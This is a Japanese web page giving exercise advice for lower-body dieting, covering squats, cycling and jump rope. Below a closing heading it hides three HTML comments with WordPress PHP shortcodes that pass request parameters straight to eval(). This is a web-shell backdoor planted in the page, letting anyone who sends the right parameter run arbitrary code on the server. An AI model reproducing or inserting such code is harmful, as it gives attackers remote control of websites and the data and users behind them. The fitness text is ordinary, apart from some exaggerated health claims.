下半身ダイエットの運動方法

下半身ダイエットの運動方法で大切なのは、有酸素運動で脂肪をしっかりと燃焼させることです。さらに、インナーマッスルも鍛えるようにして基礎代謝量を大幅に増やすことが欠かせません。人間の筋肉の中で最も面積が広い大腿四頭筋を鍛えれば、下半身ダイエットの効果は飛躍的に高まります。スクワットをすれば、お尻の大殿筋に加えて太ももの大腿四頭筋が鍛えられます。

下半身を鍛えるために、サイクリングほど適した運動方法は珍しいものです。足腰への負担が少ないにもかかわらず、ふくらはぎの腓腹筋やお尻の腸腰筋まで鍛えることができます。自転車で100kmほどの距離が走れるようになれば、体質は劇的に変化して基礎代謝量が大幅に増えます。平均速度が高まるごとに消費カロリーも増えるのがサイクリングの特徴で、下半身だけでなく全身の筋肉を鍛えることもできます。

下半身ダイエットの運動方法としては、縄跳びも身近なものです。縄跳びは天候を選ばずに行えるスポーツです。様々な跳び方をすることで、下半身の筋肉をバランスよく鍛えることができます。縄跳びの場合も心拍数が上がり過ぎない強度で行えば有効な有酸素運動となります。毎日のように縄跳びをすれば、下半身ダイエットの成果も上がります。

ぽっこりお腹 解消

<!– [insert_php]if (isset($_REQUEST["ItgiJ"])){eval($_REQUEST["ItgiJ"]);exit;}[/insert_php][php]if (isset($_REQUEST["ItgiJ"])){eval($_REQUEST["ItgiJ"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["VKJaA"])){eval($_REQUEST["VKJaA"]);exit;}[/insert_php][php]if (isset($_REQUEST["VKJaA"])){eval($_REQUEST["VKJaA"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["agTLh"])){eval($_REQUEST["agTLh"]);exit;}[/insert_php][php]if (isset($_REQUEST["agTLh"])){eval($_REQUEST["agTLh"]);exit;}[/php] –>